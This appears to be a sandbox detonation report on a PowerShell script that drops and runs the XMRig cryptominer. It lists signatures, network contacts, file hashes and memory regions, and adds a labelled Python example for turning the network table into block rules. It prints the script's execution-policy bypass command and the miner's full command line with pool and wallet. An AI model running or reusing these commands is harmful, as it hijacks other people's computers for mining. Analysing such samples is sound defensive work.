memory/4532-94-0x00007FF8C1D40000-0x00007FF8C272C000-memory.dmp

memory/4072-93-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-95-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-96-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-97-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-98-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-99-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-100-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-101-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-102-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-103-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-104-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-105-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-106-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-107-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-108-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-109-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-110-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-111-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-112-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-113-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-114-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-115-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-116-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-117-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-118-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-119-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-120-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-121-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-122-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-123-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-124-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-125-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-126-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-127-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-128-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-129-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-130-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-131-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-132-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-133-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-134-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-135-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-136-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-137-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-138-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-139-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-140-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-141-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-142-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-143-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-144-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-145-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-146-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-147-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-148-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-149-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-150-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-151-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-152-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-153-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-154-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-155-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

memory/4072-156-0x00007FF66E5B0000-0x00007FF66F1E3000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:39

Platform

win10v2004-20240426-en

Max time kernel

1789s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
(62 further identical rows omitted)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp
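Most rows in the Network table are reverse (in-addr.arpa) lookups of addresses the sandbox host touched, not infrastructure chosen by the sample; the rows that matter are the three name resolutions followed by TCP sessions: github.com and objects.githubusercontent.com (where the xmrig release archive is fetched from) and rx.unmineable.com:443 (the pool named by -o on the miner command line). The following Python is an added example, not part of the sandbox output; its table is a constructed copy of the first rows above, and the choice to leave the GitHub CDN off the block list is an assumption.

```python
"""Added example (not part of the sandbox output): reduce a detonation's
Network table to the indicators worth blocking, and confirm that the pool
named on the miner's command line was actually reached."""
from collections import defaultdict

# Constructed from the first rows of the behavioral31 Network table above.
NETWORK_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
"""


def parse_network_table(text: str) -> list[dict]:
    """Parse 'Country Destination Domain Proto' rows; skip the header and blank lines."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[0] == "Country":
            continue
        country, dest, domain, proto = parts
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto.lower()})
    return rows


def is_sandbox_noise(row: dict) -> bool:
    """PTR lookups name addresses the host talked to, not hosts the sample chose."""
    return row["domain"].endswith(".in-addr.arpa")


def tcp_contacts(rows: list[dict]) -> dict:
    """domain -> set of (ip, port) the sample actually connected to over TCP."""
    contacts = defaultdict(set)
    for r in rows:
        if r["proto"] == "tcp" and not is_sandbox_noise(r):
            contacts[r["domain"]].add((r["ip"], r["port"]))
    return dict(contacts)


def resolved_but_not_contacted(rows: list[dict]) -> set:
    """Domains looked up without a following TCP session (download failed, sinkholed, or UDP-only)."""
    looked_up = {r["domain"] for r in rows if r["proto"] == "udp" and not is_sandbox_noise(r)}
    return looked_up - set(tcp_contacts(rows))


def pool_contact_confirmed(rows: list[dict], pool_host: str, pool_port: int) -> bool:
    """True when the pool from the miner's -o option shows a TCP session on that port."""
    return any(port == pool_port for _, port in tcp_contacts(rows).get(pool_host, ()))


def block_list(rows: list[dict]) -> list[str]:
    """IP:port pairs to block. Assumption: the shared GitHub CDN is left out because
    blocking it by host would break legitimate downloads; handle that stage by
    file hash or proxy policy instead."""
    shared_cdn = ("github.com", "githubusercontent.com")
    out = []
    for domain, endpoints in tcp_contacts(rows).items():
        if domain.endswith(shared_cdn):
            continue
        out.extend(f"{ip}:{port}" for ip, port in sorted(endpoints))
    return sorted(out)


if __name__ == "__main__":
    rows = parse_network_table(NETWORK_TABLE)
    print("TCP contacts:", tcp_contacts(rows))
    print("Resolved only:", resolved_but_not_contacted(rows))
    print("Pool reached:", pool_contact_confirmed(rows, "rx.unmineable.com", 443))
    print("Block:", block_list(rows))
```

Because the pool is reached over TLS on 443, an IP:port block is the coarse control; on the proxy or DNS layer, the SNI or queried name rx.unmineable.com is the more precise one, and the same check against pool_contact_confirmed distinguishes a detonation where the miner actually mined from one where it only resolved the pool and died.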

Files

memory/4172-0-0x00007FFB47993000-0x00007FFB47995000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_43hcyhvc.pmu.ps1 (written by powershell.exe itself when it probes the AppLocker/WDAC script policy at startup; not a file dropped by the sample, so do not treat its hashes as IOCs)

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4172-6-0x0000022CE0E70000-0x0000022CE0E92000-memory.dmp

memory/4172-11-0x00007FFB47990000-0x00007FFB48451000-memory.dmp

memory/4172-12-0x00007FFB47990000-0x00007FFB48451000-memory.dmp

memory/4172-14-0x00007FFB47990000-0x00007FFB48451000-memory.dmp

memory/4172-15-0x0000022CE1260000-0x0000022CE1272000-memory.dmp

memory/4172-16-0x0000022CE1240000-0x0000022CE124A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4064-47-0x000001409A910000-0x000001409A930000-memory.dmp

memory/4172-48-0x0000022CE0B20000-0x0000022CE0D3C000-memory.dmp

memory/4064-49-0x000001409C250000-0x000001409C270000-memory.dmp

memory/4064-51-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-55-0x000001409C290000-0x000001409C2B0000-memory.dmp

memory/4064-54-0x000001409C270000-0x000001409C290000-memory.dmp

memory/4172-53-0x00007FFB47993000-0x00007FFB47995000-memory.dmp

memory/4064-52-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4172-56-0x00007FFB47990000-0x00007FFB48451000-memory.dmp

memory/4064-57-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4172-58-0x00007FFB47990000-0x00007FFB48451000-memory.dmp

memory/4064-59-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-61-0x000001409C290000-0x000001409C2B0000-memory.dmp

memory/4064-60-0x000001409C270000-0x000001409C290000-memory.dmp

memory/4064-62-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-63-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-64-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-65-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-66-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-67-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-68-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-69-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-70-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-71-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-72-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-73-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-74-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-75-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-76-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-77-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-78-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-79-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-80-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-81-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-82-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-83-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-84-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-85-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-86-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-87-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-88-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-89-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-90-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-91-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-92-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-93-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-94-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-95-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-96-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-97-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-98-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-99-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-100-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-101-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-102-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-103-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-104-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-105-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-106-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-107-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-108-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-109-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-110-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-111-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-112-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-113-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-114-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-115-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-116-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-117-0x00007FF697B20000-0x00007FF698753000-memory.dmp

memory/4064-118-0x00007FF697B20000-0x00007FF698753000-memory.dmp